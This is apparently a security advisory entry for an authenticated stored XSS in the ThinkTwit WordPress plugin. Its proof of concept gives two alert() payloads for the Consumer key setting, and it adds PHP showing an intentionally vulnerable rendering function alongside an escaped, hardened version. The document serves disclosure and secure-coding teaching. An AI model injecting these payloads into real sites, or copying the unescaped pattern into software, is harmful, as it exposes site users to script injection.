WordPress Plugin Vulnerabilities
ThinkTwit < 1.7.1 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not sanitise or escape its "Consumer key" setting before outputting it in its settings page, leading to a Stored Cross-Site Scripting issue.
Proof of Concept
Put the following payload in the "Consumer key" setting of the plugin (/wp-admin/options-general.php?page=thinktwit):
- v < 1.6.7: "><script>alert(/XSS/)</script>
- v < 1.7.1: " style=animation-name:rotation onanimationstart=alert(/XSS/)//
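The two payloads above illustrate why tag-stripping alone does not fix this class of bug: the second one contains no tags and breaks out of the value="" attribute instead. The following is an added example, not ThinkTwit's own code; the option name, function names, settings group and the assumed consumer-key character set are hypothetical, while the WordPress APIs used (get_option, esc_attr, wp_strip_all_tags, sanitize_text_field, register_setting, add_settings_error) are real.

```php
<?php
// Added example (not the plugin's code). Option/function names are assumptions.

// Vulnerable pattern: the stored setting is echoed straight into an attribute.
function example_render_consumer_key_vulnerable() {
    $key = get_option( 'example_consumer_key', '' );
    echo '<input type="text" name="example_consumer_key" value="' . $key . '">';
}

// Insufficient fix: stripping tags stops "><script>...</script>, but a value
// such as  " style=... onanimationstart=...  contains no tags, so it survives
// wp_strip_all_tags() unchanged and still closes the value="" attribute.
function example_render_consumer_key_tags_stripped() {
    $key = wp_strip_all_tags( get_option( 'example_consumer_key', '' ) );
    echo '<input type="text" name="example_consumer_key" value="' . $key . '">';
}

// Hardened: escape for the exact output context (an HTML attribute).
// esc_attr() encodes the double quote, so no new attribute can be introduced.
function example_render_consumer_key_safe() {
    $key = get_option( 'example_consumer_key', '' );
    echo '<input type="text" name="example_consumer_key" value="' . esc_attr( $key ) . '">';
}

// Defence in depth: validate on save as well. A consumer key is an opaque
// token; the allowed character set below is an assumption, adjust to the API.
function example_sanitize_consumer_key( $value ) {
    $value = sanitize_text_field( (string) $value );
    if ( '' !== $value && ! preg_match( '/^[A-Za-z0-9_-]{1,128}$/', $value ) ) {
        add_settings_error(
            'example_consumer_key',
            'invalid_key',
            'Consumer key may only contain letters, digits, "_" and "-".'
        );
        return get_option( 'example_consumer_key', '' ); // keep the previous value
    }
    return $value;
}

// Register the option so the sanitize callback runs on every save.
add_action( 'admin_init', function () {
    register_setting( 'example_settings_group', 'example_consumer_key', array(
        'type'              => 'string',
        'sanitize_callback' => 'example_sanitize_consumer_key',
        'default'           => '',
    ) );
} );
```

Escaping at output is the control that actually closes the bug; the save-time validation only narrows what a user with settings access can store.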
Classification
Type
XSS
Miscellaneous
Original Researcher
Vinit Yashwantrao
Submitter
Vinit Yashwantrao
Verified
Yes
Timeline
Publicly Published
2021-08-18
Added
2021-08-18
Last Updated
2022-04-09